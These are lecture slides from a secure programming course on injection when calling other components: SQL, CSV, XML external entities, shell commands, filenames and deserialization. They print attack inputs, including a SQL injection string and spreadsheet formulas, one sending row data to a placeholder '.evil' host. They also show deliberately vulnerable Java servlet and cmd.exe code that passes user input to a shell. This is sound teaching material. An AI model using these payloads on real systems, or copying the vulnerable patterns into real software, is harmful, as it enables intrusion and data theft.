SWE 681 / ISA 681 Secure Software Design & Programming
Lecture 5: Calling Out to Other Components (including injection)
Dr. David A. Wheeler
2020-11-14

Abstract view of a program
[Diagram labels: Input; Program; Process Data (Structured Program Internals); Output; Call-out to other programs (also consider input & output issues); marker "You are here"]

The XKCD cartoon on SQL injection
Randall Munroe, “Exploits of a Mom”, XKCD, https://xkcd.com/327/
Included under the conditions of https://xkcd.com/license.html

Outline
• General issues
• Focus on metacharacters & issues of:
  – SQL (countering “SQL injection”)
  – CSV
  – Command/shell (countering “command injection”)
  – Filenames
• Insecure deserialization
• Assume breach, detect/respond, & logs
• Check what you get back

No Man (or Program) is an Island
• Practically no program is truly self-contained
• Nearly all programs depend on/call out to other programs for resources
  – Operating systems
  – Software libraries
  – Local services
  – Remote services (DNS, web servers, tile servers, etc.)
• Sometimes dependency is not obvious
  – Transitive dependency (A depends on B depends on C …)
  – Leads to dependencies on many components/hidden infrastructure
  – E.g., dynamic libraries, kernel modules, language run-times, C run-time, remote webserver operating systems, etc.

Be careful about the components/services your program trusts
• What components/services do you trust… and how much?
• What do you send to them (output to them)?
  – Read the documentation: what’s allowed/supported?
  – Does the component trust its data, e.g., does it auto-download references or execute embedded code?
  – Encode/filter as necessary
• How do you send data?
  – Alternatives? Encrypted channels?
• What do you accept back (input from them)?
  – How much do you trust the results? Maybe check them!
• How do you accept it back, and what happens if it takes too long?

Call only safe library routines
• You want to reuse libraries
  – But their specifications may not guarantee that they’re secure
  – Their specification may even guarantee they’re insecure
  – Implementation may be insecure on your platform/environment
• Prefer libraries that guarantee what you want
  – Use the right library, e.g., don’t use eval(), use something specialized
  – E.g., when parsing JSON with JavaScript, use JSON.parse() not eval()
• Sometimes you can wrap a routine to do what you need
• Where possible, test if it provides capabilities you need for security
  – Perform test in compilation, installation, and/or at start-up
• You may sometimes need to re-implement a library if it’s insecure
  – If you can’t be sure, re-implement
  – It is your users who are hurt if you choose an insecure library
  – You are responsible for the libraries/infrastructure you choose

AJAX & JSON
• AJAX = “Asynchronous JavaScript and XML”
  – Common set of technologies/techniques
• Often uses JSON = JavaScript Object Notation
  – For data serialization, original spec RFC 4627
• JSON example (JSON doesn’t allow trailing commas; JSON5 does):
    {
      "firstName": "David",
      "lastName": "Wheeler",
      "address": {
        "streetAddress": "1600 Pennsylvania Ave",
        "city": "Washington",
        "state": "DC"
      }
    }

Don’t just “eval” untrusted data… JSON is an example
• In general, don’t run “eval” with untrusted data
• Most JSON-formatted text is also syntactically legal JavaScript code
  – “Easy” way to parse data in JavaScript is via eval()
  – Incorrect: doesn’t support some Unicode characters
• Security vulnerability if data & JavaScript environment are not controlled by a single trusted source
  – E.g., malicious JavaScript attack, application forgery, etc.
• In general, don’t “eval” untrusted data!!!
  – In JavaScript, instead use newer function JSON.parse()
    • Mozilla Firefox 3.5+, MS IE 8+, Opera 10.5+, Google Chrome, Safari

Limit call-outs to valid values
• Ensure any call out to another program only permits valid and expected values for every parameter
  – Including libraries, daemons, remote servers
• This is more difficult than it sounds
  – Many library calls or commands call other components in potentially surprising ways
    • Don’t always clearly document exactly what’s safe
• Result: Need to be conservative
  – Common problem: Metacharacters

Metacharacters
• Metacharacters = characters in an input that are not interpreted as data
  – Metacharacters instead control how the other characters are interpreted
  – May be commands, delimiters of data, etc.
• If there’s a language specification, it has metacharacters
• Examples:
  – SQL: the single-quote ' can begin/end a string
  – POSIX shell: $ can begin a parameter reference, e.g., $HOME
• If your program allows attackers to insert such metacharacters, don’t pass them on unescaped
  – You often must allow metacharacters through (“O'Mally”)

SQL – Getting Connected in Java
    import java.sql.*;

    class ExecuteSqlQuery {
      public static void main(String[] args) {
        // In real code, use try {…} catch () … to deal with database connection failure, etc.
        String connectionURL = "jdbc:mysql://localhost:3306/mydatabase";
        // Load JDBC driver for MySQL (for example):
        Class.forName("com.mysql.jdbc.Driver").newInstance();
        // Connect given connectionURL, username, password:
        Connection connection = DriverManager.getConnection(connectionURL, "root");
        // What’s wrong with this password handling approach?
        Statement statement = connection.createStatement();
        ResultSet rs = null;

SQL – How to do it wrong
        …
        // User input search_lastname:
        String QueryString = "select * from authors where lastname = '"
            + search_lastname + "'";   // data surrounded by single-quotes
        rs = statement.executeQuery(QueryString);
        while (rs.next()) {
          System.out.println(rs.getString(2) + "\n");
        }
        // … eventually close …
        rs.close(); statement.close(); connection.close();
      }
    }
This string concatenation, followed by an execution, takes the untrusted user input data & passes it directly to an interpreter. Bad idea.

SQL Query: Intent & Actual
• Intent of programmer is to create:
    select * from authors where lastname = 'user_input'
• Imagine attacker provides, as input value:
    name' OR 'a'='a
• Resulting query is:
    select * from authors where lastname = 'name' OR 'a'='a'
• Last part is always true, so the whole table is returned
• Single quote is a SQL metacharacter

SQL Injection
• SQL injection = attack where:
  – An attacker inserts data
  – That will eventually be supplied to a SQL interpreter
  – In a way where that data will be misinterpreted (e.g., as a metacharacter)
• Previous input example, name' OR 'a'='a, is an example of a SQL injection attack

SQL injection: Other common attacks
• Massive variation in SQL interpreters
  – SQL “standard” isn’t
  – So attacks vary depending on interpreter
• Common sequences in SQL injection attacks:
  – Single/double quote (as already seen)
  – Using “;” as command separator
    • Insert whole new commands after separator
  – Using “--” as comment token
    • Specify “ignore material afterwards” & foil limiting text
• Again, don’t try to create a blacklist

Solution for SQL Injection: Prepared statements
• “Prepared statement” to identify placeholders
  – Pre-existing library then escapes it properly
  – Properly-implemented Object-Relational Mapping (ORM) systems internally use prepared statements
• Many advantages
  – Library does the escaping for you: simpler, more likely to get right
  – Tends to produce easier-to-maintain code
  – Tends to execute faster
  – Especially important for SQL: different SQL engines can have different rules

Java “prepareStatement” method
• public interface “Connection” represents a connection (session) with a specific database
  – SQL statements are executed & results are returned within the context of a connection
• Includes method
    PreparedStatement prepareStatement(String sql) throws SQLException …
  – Creates a PreparedStatement object for sending prepared SQL statements to the database
    • Has the effect of escaping metacharacters in each parameter
  – “sql” is an SQL statement that may contain one or more '?' IN parameter placeholders

Prepared statements example (Java)
    String QueryString = "select * from authors where lastname = ?";
    PreparedStatement pstmt = connection.prepareStatement(QueryString);
    // Set first param - library escapes it
    pstmt.setString(1, search_lastname);
    // executeQuery() returns the ResultSet; execute() only returns a boolean
    ResultSet results = pstmt.executeQuery();

Warning: “prepareStatement” can be misused, too!!
• Prepared statements only work if all input influenced by untrusted users is actually prepared
  – E.g., substituted as “?” in query string & set with setString
• Don’t do this (where search_lastname is untrusted):
    String QueryString = "select * from authors where lastname = '"
        + search_lastname + "'";
    PreparedStatement pstmt = connection.prepareStatement(QueryString);
    ResultSet results = pstmt.executeQuery();
“I’m using prepared statements, so nothing can go wrong …”

Other (SQL) injection countermeasures
• Writing your own escape code
  – Be careful: identify characters that must not or don’t need escaping (e.g., alphanumerics) & escape everything else (whitelist)
  – Rules vary depending on SQL engine & its version
  – Don’t do this with SQL; use libraries designed for the purpose!
• Stored procedures can help prevent SQL injection attacks
  – By limiting types of statements that can be passed to their parameters
  – However, attackers can often work around those limits
  – Can prevent some attacks, but by themselves they don’t counter SQL injection (you still have to escape, etc.)
• Prevent metacharacters from getting in as input (input validation)
  – If you can, do it. ASCII alphanumerics are normally not metachars
  – Input validation often cannot be the sole countermeasure; often must accept some metacharacters (e.g., '). Input validation is not enough
  – Do not depend solely on input validation to counter injection
    • Mistakes too easily made & future mods may require removing restrictions

Not just SQL
• Nearly all database systems (SQL or not) support languages
  – At least for queries
• So need to prevent metacharacter misinterpretation
  – Use a prepared statement library if you can
  – If none available, consider creating one
  – At least create an escaping library: easy to check & reuse
Metacharacters also show up in CSV, XML, command shell, etc.

Comma Separated Value (CSV) Injection
• CSV format is very simple:
    UserId,BillToDate,ProjectName,Description,DurationMinutes
    1,2017-07-25,Test Project,Flipped the jibbet,60
    2,2017-07-25,Important Client,"Bop, dop, and giglip",240
    2,2017-07-25,Important Client,"=2+5+cmd|' /C calc'!A0",240
    2,2017-07-25,Important Client,"=IMPORTXML(CONCAT(""http://someserver-with-log.evil?v="", CONCATENATE(A2:E2)), ""//a"")",240
• Spreadsheets are often used to read CSV files, but they may execute formulas in CSV files (e.g., if a field begins with “=”)
  – Some executions request confirmation, but users often confirm
  – IMPORTXML & others enable no-confirmation exfiltration
  – Esp. problematic: fields starting with =, +, -, @
Source: “The Absurdly Underestimated Dangers of CSV Injection”, George Mauer, 7 October 2017, http://georgemauer.net/2017/10/07/csv-injection.html
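One way to act on the CSV slide above when a program writes CSV that people may open in a spreadsheet is sketched below. It is an illustration under assumptions, not the lecture's code: the class and method names (CsvFieldEncoder, encodeField, encodeRow) are hypothetical, and prefixing an apostrophe is a commonly suggested mitigation whose effect depends on the spreadsheet program. Note the trade-off that a legitimate value such as "-5" would also be prefixed.

```java
import java.util.List;
import java.util.stream.Collectors;

/** Sketch (hypothetical helper): neutralize formula-like fields before writing CSV. */
final class CsvFieldEncoder {
    private CsvFieldEncoder() {}

    /** Returns the field quoted for CSV, with a leading =, +, -, or @ defused. */
    static String encodeField(String value) {
        String v = value;
        // Spreadsheets may treat fields starting with these characters as formulas,
        // so prefix an apostrophe to ask the spreadsheet to read them as text.
        if (!v.isEmpty() && "=+-@".indexOf(v.charAt(0)) >= 0) {
            v = "'" + v;
        }
        // Ordinary CSV quoting: wrap in double quotes and double any embedded quote.
        return "\"" + v.replace("\"", "\"\"") + "\"";
    }

    /** Joins already-encoded fields into one CSV row. */
    static String encodeRow(List<String> fields) {
        return fields.stream()
                .map(CsvFieldEncoder::encodeField)
                .collect(Collectors.joining(","));
    }

    public static void main(String[] args) {
        // The third example row from the slide, written out defensively.
        System.out.println(encodeRow(List.of(
                "2", "2017-07-25", "Important Client", "=2+5+cmd|' /C calc'!A0", "240")));
    }
}
```

Quoting every field keeps commas and embedded quotes from changing the column structure, which is the metacharacter problem; the apostrophe prefix addresses the separate formula-execution problem.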

XML: Check formatting
• Lots of data/messages are formatted using XML
• “Well-formed”: Follows certain syntax rules
  – E.g., all opened tags are closed, nesting ok
  – Check before using from untrusted sources!
• “Valid”: Meets some schema definition
  – Check for validity before using untrusted input
    • Eliminates many problems: schema == whitelist
  – Don’t let attacker determine what schema to use!
    • Decide what schema is okay & use that

XML Vulnerability: External Entities / External References
• XML supports external references which can be auto-loaded, e.g.:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
      "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">

    <!DOCTYPE letter [
      <!ENTITY part1 SYSTEM "http://www.example.com/part1.xml">
      <!ENTITY part2 SYSTEM "../secrets/part2.xml">
    ]>
    …
    <building> &part1; &part2; </building>
• Don’t accept unchecked external references from untrusted sources
• Possible solutions:
  – Configure XML reader to ignore external references (& TEST that!)
  – Forbid or check (with whitelist) external reference before use
  – Don’t use XML, SOAP (which uses XML), etc.
This is the #4 vulnerability on the OWASP Top 10 of 2017 (XML External Entities (XXE)): https://www.owasp.org/index.php/Top_10-2017_A4-XML_External_Entities_(XXE)
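The "configure the XML reader" option above might look like the following with the JDK's built-in JAXP parser. This is a minimal sketch under assumptions: the class and method names (SafeXml, parseUntrusted) are hypothetical, and the feature URI is the one recognized by the Xerces-derived parser bundled with the JDK, so other parser implementations may need different settings. As the slide says, test that the configuration really rejects external references.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

/** Sketch (hypothetical helper): parse untrusted XML with DOCTYPEs refused. */
final class SafeXml {
    private SafeXml() {}

    static Document parseUntrusted(String xml) throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // Ask the implementation to apply its secure-processing limits.
        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Refuse any DOCTYPE declaration, which also rules out external entities.
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        DocumentBuilder builder = dbf.newDocumentBuilder();
        return builder.parse(
                new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
    }
}
```

With this configuration a document like the "letter" example above should fail to parse instead of fetching part1.xml or reading ../secrets/part2.xml. Refusing DOCTYPEs entirely is the bluntest choice; an application that needs DTDs would need a narrower setting.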

Command shell
• Most systems have at least one command shell
  – Useful for quickly combining programs, query, debugging, etc.
  – Unix-like systems: e.g., /bin/sh, bash, dash, ksh, csh
  – Windows: e.g., cmd.exe, PowerShell
• Command shell idea originally from MULTICS (1960s)
• Many metacharacters, and shell can call other commands
• Useful… but easy to make mistakes
  – Only use when you really need its capability & be cautious doing so
• Several library calls may call command shell
  – system(3), popen(3); sometimes execlp(3) and execvp(3)
  – Perl & shell backtick (`); Python os.system()
  – Java java.lang.Runtime.getRuntime().exec()
  – In C, execve(3) does not invoke shell
    • Use execve(3), not system(3), if you don’t need full system(3) functionality
• Many programs have mechanisms to invoke commands too
  – Mail, vim, emacs, …

Unix-like shell metacharacters
• Shell metacharacter list is long; one list is:
    & ; ` ' " | * ? ~ < > ^ ( ) [ ] { } $ \n \r
• Yet that list is known to be wrong, e.g.:
  – Space & tab: normal separators
  – # is comment (all rest on line ignored)
  – ! means “not” in some contexts & history in others
  – Leading “-” on parameter may be considered option
• Whitelist: escape non-alphanumerics
• Other commands have their own character set and may need to escape through shell too
  – Escape in right order, so that it’s actually escaped

SAMATE 1596 (1) – Unix-like
    // SAMATE 1596 - CWE-077: Failure to Sanitize Data into a Control Plane (Command Injection) at line 44, 45
    /*
    Description: Tainted input allows command execution.
    Keywords: Port Java Size0 Complex0 Taint Unsafe
    InvalidParam: "user=bogus; ls -l /"
    ValidParam: user=root

    Copyright 2005 Fortify Software.

    Permission is hereby granted, without written agreement or royalty fee, to
    use, copy, modify, and distribute this software and its documentation for
    any purpose, provided that the above copyright notice and the following
    three paragraphs appear in all copies of this software.

    IN NO EVENT SHALL FORTIFY SOFTWARE BE LIABLE TO ANY PARTY FOR DIRECT,
    INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
    USE OF THIS SOFTWARE AND ITS DOCUMENTATION, EVEN IF FORTIFY SOFTWARE HAS
    BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

    FORTIFY SOFTWARE SPECIFICALLY DISCLAIMS ANY WARRANTIES INCLUDING, BUT NOT
    LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
    PARTICULAR PURPOSE, AND NON-INFRINGEMENT.

    THE SOFTWARE IS PROVIDED ON AN "AS-IS" BASIS AND FORTIFY SOFTWARE HAS NO
    OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
    MODIFICATIONS.
    */

SAMATE 1596 (2) – Unix-like
    import java.lang.Runtime;
    import java.io.*;
    import javax.servlet.*;       // ServletException, ServletOutputStream
    import javax.servlet.http.*;

    public class Proc1_bad extends HttpServlet {
      public void doGet(HttpServletRequest req, HttpServletResponse res)
          throws ServletException, IOException {
        res.setContentType("text/html");
        ServletOutputStream out = res.getOutputStream();
        out.println("<HTML><HEAD><TITLE>Test</TITLE></HEAD><BODY><blockquote><pre>");

SAMATE 1596 (3) – Unix-like
        String user = req.getParameter("user");
        if (user != null) {
          try {
            String[] args = { "/bin/sh", "-c", "finger " + user };  // Uh oh!!!!
            Process p = Runtime.getRuntime().exec(args);            // Disaster here.
            BufferedReader fingdata =
                new BufferedReader(new InputStreamReader(p.getInputStream()));
            String line;
            while ((line = fingdata.readLine()) != null)
              out.println(line);
            p.waitFor();
          } catch (Exception e) {
            throw new ServletException(e);
          }
        } else {
          out.println("specify a user");
        }
        out.println("</pre></blockquote></BODY></HTML>");
        out.close();
      }
    }
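For contrast with the SAMATE example above, a safer shape might be sketched as follows. It is not part of the SAMATE test case: the class name FingerCommand, the username pattern, and the bare "finger" program name are assumptions for illustration. The two ideas are to validate the value against a whitelist and to pass it as its own argument without going through /bin/sh at all.

```java
import java.io.IOException;
import java.util.List;
import java.util.regex.Pattern;

/** Sketch (hypothetical helper): run finger without a shell, on a validated name. */
final class FingerCommand {
    private FingerCommand() {}

    // Assumed username policy: starts with a letter, digit, or underscore
    // (so never "-"), then up to 31 letters, digits, '_', '.', or '-'.
    private static final Pattern VALID_USER =
            Pattern.compile("[A-Za-z0-9_][A-Za-z0-9_.-]{0,31}");

    /** Builds the argument vector, rejecting anything outside the whitelist. */
    static List<String> build(String user) {
        if (user == null || !VALID_USER.matcher(user).matches()) {
            throw new IllegalArgumentException("invalid user name");
        }
        // Each list element is passed as one argument; no shell parses it.
        return List.of("finger", user);
    }

    /** Starts the process; the caller reads its output and waits for it. */
    static Process run(String user) throws IOException {
        return new ProcessBuilder(build(user)).redirectErrorStream(true).start();
    }
}
```

With this shape the SAMATE invalid parameter "bogus; ls -l /" is rejected by the pattern, and even a value that slipped through would reach finger as a single argument, not as shell syntax. The leading-character rule also keeps the value from being read as an option.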

Example of bad code on Windows
    String btype = request.getParameter("backuptype");
    String cmd = new String("cmd.exe /K \"c:\\util\\rmanDB.bat " + btype
        + "&&c:\\utl\\cleanup.bat\"");
    Runtime.getRuntime().exec(cmd);
Again, data from an untrusted user is used, unescaped, as part of a larger command: disaster.
Source: “Secure Programming with Static Analysis”, Chess & West, page 168

Storing data: Databases & simple files
• Databases (e.g., SQL) provide many useful functions
  – E.g., arbitrary query
  – Enable storage of field data
• But using them means that your program depends on a potentially-complex DBMS
  – Need to set up / configure
  – May have its own vulnerabilities, etc.
  – You have to include lower-level kernel anyway
• If simple files work for storage (e.g., with filenames as key), may want to use them for storage
  – Can be faster, simpler. Directory structures can simplify much
  – But not if you start rewriting a DBMS (!)
  – Design decision (DBMS vs. files), but either involves calling out

Common data type passed elsewhere: Pathnames
• Pathname = how to find file system object
  – Unix-like: Sequence of 1+ filenames separated by “/”
• Pathnames are often partly controlled by untrusted users
  – Often useful to use file/directory names as a key to identify relevant data; this can lead to an untrusted user controlling filenames
  – Monitoring/management of VM/shared system: untrusted monitoree controls filenames
  – Defense-in-depth: Counter attacker who gets in part way
  – Need to protect… so need to know about filename issues
• Obvious case: Don’t allow redirection outside dir
  – E.g., if whitelist allowed “.”, “/”, and maybe “\”: problem!
  – “trusted_root_path + username” might go somewhere unexpected if username is “../mysecrets”
  – As always, use limited whitelist for info used to create filenames
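The "trusted_root_path + username" case above can be guarded along these lines. This is a sketch under assumptions: the class name UserDirResolver and the allowed-name pattern are hypothetical, and the containment check is purely lexical (normalize() does not resolve symbolic links, so code that must also resist symlink tricks would need an additional check such as comparing real paths).

```java
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.regex.Pattern;

/** Sketch (hypothetical helper): map an untrusted name to a path under a trusted root. */
final class UserDirResolver {
    private UserDirResolver() {}

    // Limited whitelist: no ".", "/", or "\" can appear in the name at all.
    private static final Pattern SAFE_NAME = Pattern.compile("[A-Za-z0-9_]+");

    static Path resolve(Path trustedRoot, String username) {
        if (username == null || !SAFE_NAME.matcher(username).matches()) {
            throw new IllegalArgumentException("name not allowed");
        }
        Path root = trustedRoot.toAbsolutePath().normalize();
        Path candidate = root.resolve(username).normalize();
        // Defense in depth: even after the whitelist, confirm containment.
        if (!candidate.startsWith(root)) {
            throw new IllegalArgumentException("path escapes trusted root");
        }
        return candidate;
    }

    public static void main(String[] args) {
        Path root = Paths.get("data");   // assumed example root directory
        System.out.println(resolve(root, "alice"));
    }
}
```

Both checks are kept on purpose: the whitelist is the primary control, and the startsWith test still holds if a later change loosens the pattern.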

Windows Pathnames: Difficult to make secure
• Windows pathname interpretations vary depending on:
  – Version of Windows
  – API used (some use CreateFile, support \\.\)
• “letter:…” and “\\server\share...” have special meaning
• Nasty issue: reserved names in files
  – Built-in reserved device names: CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9
  – Even worse, drivers can create more reserved names (!)
  – Avoid reserved names with/without extension: if an attacker can trick the program into reading/writing one (e.g., com1.txt), that may (depending on API) cause a read/write to the device
  – In this case, even simple alphanumerics can cause disaster (rare situation!)
• Directory separator is \ and / (\ is widely used for escapes)
• Don’t end a file or directory name with space or period
  – Underlying file system may support it, but Windows shell & user interface don’t
• More info: http://msdn.microsoft.com/en-us/library/aa365247.aspx
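A check for the built-in reserved names listed above might be sketched like this. The class and method names (WindowsNames, isRisky) are hypothetical, and the list covers only the built-in device names from the slide; as noted above, drivers can add more, so this is a partial safeguard at best.

```java
import java.util.Locale;
import java.util.Set;

/** Sketch (hypothetical helper): flag filenames that are risky on Windows. */
final class WindowsNames {
    private WindowsNames() {}

    private static final Set<String> RESERVED = Set.of(
            "CON", "PRN", "AUX", "NUL",
            "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9",
            "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9");

    /** True if the single filename (not a full path) should be refused. */
    static boolean isRisky(String filename) {
        if (filename.isEmpty()) {
            return true;
        }
        // Names ending in space or period are mishandled by the Windows shell.
        char last = filename.charAt(filename.length() - 1);
        if (last == ' ' || last == '.') {
            return true;
        }
        // Reserved names apply with or without an extension, in any letter case.
        int dot = filename.indexOf('.');
        String base = (dot >= 0) ? filename.substring(0, dot) : filename;
        return RESERVED.contains(base.trim().toUpperCase(Locale.ROOT));
    }
}
```

Trimming the base name before the lookup is a deliberately conservative choice in this sketch; it may refuse a few names that Windows would actually accept.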

Unix-like filenames
• Unix-like systems in practice allow almost any sequence of bytes as a pathname
  – Separated by “/”, terminated by \0
  – Case sensitive (normally)
• So yes, they allow problematic filenames with:
  – Spaces
  – Control characters (including tab, newline, escape)
  – Non-characters (e.g., non-UTF-8)
  – Leading “-” (option marker)
• Problematic filenames can cause trouble later
• Some additional problems happen when using shell
  – Filename problems are not limited to shell

First, a POSIX shell specific issue: Variable quoting
• POSIX (Bourne) shell variable references need to be quoted if the variable can include input separators
  – Separators are space, tab, newline by default
• So this is usually wrong:
    cat $filename
  – If $filename might include space, tab, or newline, it will be split into multiple filenames
• So if you use a Bourne shell to process filenames:
  – Always quote variable references unless you know the variable cannot contain space, tab, or newline characters:
      cat "$filename"
  – Set IFS to just newline & tab (no space) early on, e.g.:
      IFS="$(printf '\n\t')"
  – Do both if you can (defense-in-depth); the IFS change may require other changes

POSIX filenames: How to do it wrongly (one-directory)
• One-directory example 1:
    cat * > ../collection            # WRONG
  – Fails if a filename begins with “-” (e.g., “-n”)
  – This can happen in any language
• One-directory example 2:
    for file in * ; do               # WRONG
      cat "$file" >> ../collection
    done
  – Also fails if filename begins with “-”
  – Fails if no files (will loop on file named “*”)
    • Primarily a problem in shell (glob libraries simplify this)

POSIX filenames: How to do it wrongly (multiple-directories)
• POSIX “find” is the usual mechanism for walking directories
  – Automatically inserts directory name in front
  – Leading “-” can’t happen if directory name doesn’t start with “-”
  – “Easy” ways often fail with space, newline, tab (often split up)
  – If a produced filename contains “*” etc., then when $(…) returns, shell will try to expand using that (“set -f” disables this)
• Multi-directory example 1:
    cat $(find . -type f) > ../collection      # WRONG
  – Fails if file contains space, tab, newline
• Multi-directory example 2:
    ( for file in $(find . -type f) ; do       # WRONG
        cat "$file"
      done ) > ../collection
  – Same problem
• Multi-directory example 3:
    ( for file in $(find . -type f) ; do
        cat "$file"
      done ) > ../collection                   # WRONG
  – Same problem

POSIX filenames: How to do it wrongly (multiple-directories)
• Multi-directory example 4:
    ( find . -type f | xargs cat ) > ../collection     # WRONG
  – Wrong. By default, xargs’ input is parsed, so space characters (as well as newlines) separate arguments, and the backslash, apostrophe, double-quote, and ampersand characters are used for quoting
• Multi-directory example 5:
    ( find . -type f |
      while IFS="" read -r filename ; do
        cat "$filename"
      done ) > ../collection                           # WRONG
  – Wrong. Ok if filenames can’t include newline
  – If filenames can include newline, then any line-at-a-time processing of filenames fails

POSIX filenames: How to do it right
• Prefix all globs/filenames so they cannot begin with "-" when expanded
  – Add “./” prefix, etc., as needed
• Handle any filename byte sequence
  – Including tab, newline, escape, non-UTF-8
  – Filenames are sequences of bytes, not characters
• Beware of printing filenames
  – “Escape” control character may control other things
  – Newline/tab/space may separate surprisingly
  – Non-UTF-8: Unix-like systems don’t guarantee printability
  – “<” and “&” if output to HTML/XML

Correct glob use #1 (one directory)
    # Prefix glob (do this in any language) with ./
    # Check if file exists (more important in shell)
    for file in ./* ; do          # Use "./*", NEVER "*"
      if [ -e "$file" ] ; then    # Prevent empty match
        COMMAND ... "$file" ...
      fi
    done

Correct find use
• Quick ways to use find:
    find ... -exec COMMAND ... {} \;
    find ... -exec COMMAND ... {} +
• Nonstandard but common find/xargs extensions:
    find . -print0 | xargs -0 COMMAND
• Nonstandard extensions to find/shell (bash ok):
    find . -print0 |
    while IFS="" read -r -d "" file ; do
      ... COMMAND "$file"   # Use quoted "$file", not $file
    done

File walking in shell – a simpler alternative, but with a caveat
• If IFS doesn’t include space (per above), and filenames cannot include tab/newline…
• Then shell patterns like this work just fine:
    set -f    # Needed so “*” in filenames is not expanded
    for file in $(find .) ; do
      COMMAND "$file" ...
    done
• Simpler, but only if you can guarantee it
• Alternative: try, & skip files with control chars:
    controlchars="$(printf '*[\001-\037\177]*')"
    set -f
    for file in $(find . ! -name "$controlchars") ; do
      COMMAND "$file" ...
    done

More information on Unix-like pathnames
• “Filenames and Pathnames in Shell: How to do it correctly” http://www.dwheeler.com/essays/filenames-in-shell.html
• “Fixing Unix/Linux/POSIX Filenames: Control Characters (such as Newline), Leading Dashes, and Other Problems” http://www.dwheeler.com/essays/fixing-unix-linux-filenames.html

Windows-specific file content problems
• Windows binary vs. text file semantics
  – “Text” often requires extra translations on input & output
    • Windows text files use the CP/M line-ending convention CRLF
    • Most other systems/languages use 1-char line-ending (LF)
    • Yes, there are rare alternatives (IBM NEL, pre-MacOS-X CR)
  – Can lead to misinterpretation or data corruption
    • If it translates when it shouldn’t, or doesn’t when it should
    • E.g., \n in C/C++/Java often has to be converted back & forth
• Character encoding
  – Many nonstandard Windows encodings (e.g., 1252, etc.)
  – Many files use a UTF-16-style encoding (byte order!)
  – Guessing is common in Windows apps… yet can easily go wrong
    • Many programs use Win32 charset detection function IsTextUnicode
    • Especially bad pre-Vista (“Bush hid the facts” or “this app can break”)
    • More recent tweaks make it less likely, but the fundamental problem is still there
  – Can lead to mojibake (aka “character salad”)/misinterpretation
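One way to avoid encoding guesswork in Java is to decode with an explicitly chosen charset and to fail on malformed input; new String(bytes, charset) would silently substitute replacement characters instead. The sketch below assumes the data is supposed to be UTF-8; the class and method names (StrictText, decodeUtf8) are hypothetical.

```java
import java.nio.ByteBuffer;
import java.nio.charset.CharacterCodingException;
import java.nio.charset.CodingErrorAction;
import java.nio.charset.StandardCharsets;

/** Sketch (hypothetical helper): decode bytes as UTF-8 or fail, never guess. */
final class StrictText {
    private StrictText() {}

    static String decodeUtf8(byte[] bytes) throws CharacterCodingException {
        return StandardCharsets.UTF_8.newDecoder()
                // REPORT makes the decoder throw on bad input.
                .onMalformedInput(CodingErrorAction.REPORT)
                .onUnmappableCharacter(CodingErrorAction.REPORT)
                .decode(ByteBuffer.wrap(bytes))
                .toString();
    }
}
```

A caller can then treat CharacterCodingException as "this input is not what it claims to be" and reject it, which fits the check-what-you-get-back theme of the lecture.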

Introduction: Insecure Deserialization / Demarshalling
• Deserialization = convert stream of bytes/characters back into a copy of the original object
• Applications/APIs may request deserialization of hostile or tampered objects from attacker
  – Typically by calling some deserialization library, which may be hidden within a larger system
• Most deserialization attacks can be subdivided as:
  1. Object and data structure related attacks where the attacker modifies application logic or achieves arbitrary remote code execution if there are classes available to the application that can change behavior during or after deserialization.
  2. Typical data tampering attacks such as access-control-related attacks where existing data structures are used but the content is changed [OWASP]
OWASP 2017 top ten #8 is Insecure Deserialization; see also CWE-502. More: https://www.owasp.org/index.php/Top_10-2017_A8-Insecure_Deserialization

Examples where Insecure Deserialization could happen
• Java’s Serializable format
• Python’s “pickle” library (can recreate objects)
• Remote- and inter-process communication (RPC/IPC)
• Wire protocols, web services, message brokers
• HTTP cookies
  – If you serialize an object to a cookie, deserialize the cookie later, & leave the cookie signature unchecked

Countering insecure deserialization
• Use data-only formats (e.g., JSON)
  – Instead of formats that can embed arbitrary objects
  – Only deals with case #1, object and data structure related attacks
• Only deserialize data with a trusted signature
  – If an attacker could have created/modified it, don’t trust it
  – Must verify the signature first!
  – Your application could be the signer; if so, it can use a (fast) shared-secret MAC algorithm (secret shared with self)
• Don’t let the attacker control the data to be deserialized
• Input validation, but beware: it is a poor approach
  – Hard to do correctly, so in general unreliable
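The “verify signature first” step can be sketched with the JDK’s HMAC support, assuming the application signs its own data with a secret that it alone holds. The class name `SignedPayload` and its methods are hypothetical; key storage and rotation are outside this sketch.

```java
import java.security.GeneralSecurityException;
import java.security.MessageDigest;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

class SignedPayload {
    // Compute an HMAC-SHA256 tag over the serialized bytes.
    static byte[] mac(byte[] key, byte[] payload) {
        try {
            Mac hmac = Mac.getInstance("HmacSHA256");
            hmac.init(new SecretKeySpec(key, "HmacSHA256"));
            return hmac.doFinal(payload);
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException("HMAC-SHA256 unavailable", e);
        }
    }

    // Return true only if the received tag matches; MessageDigest.isEqual
    // compares in constant time. Deserialize only after this returns true.
    static boolean isAuthentic(byte[] key, byte[] payload, byte[] receivedTag) {
        return MessageDigest.isEqual(mac(key, payload), receivedTag);
    }
}
```

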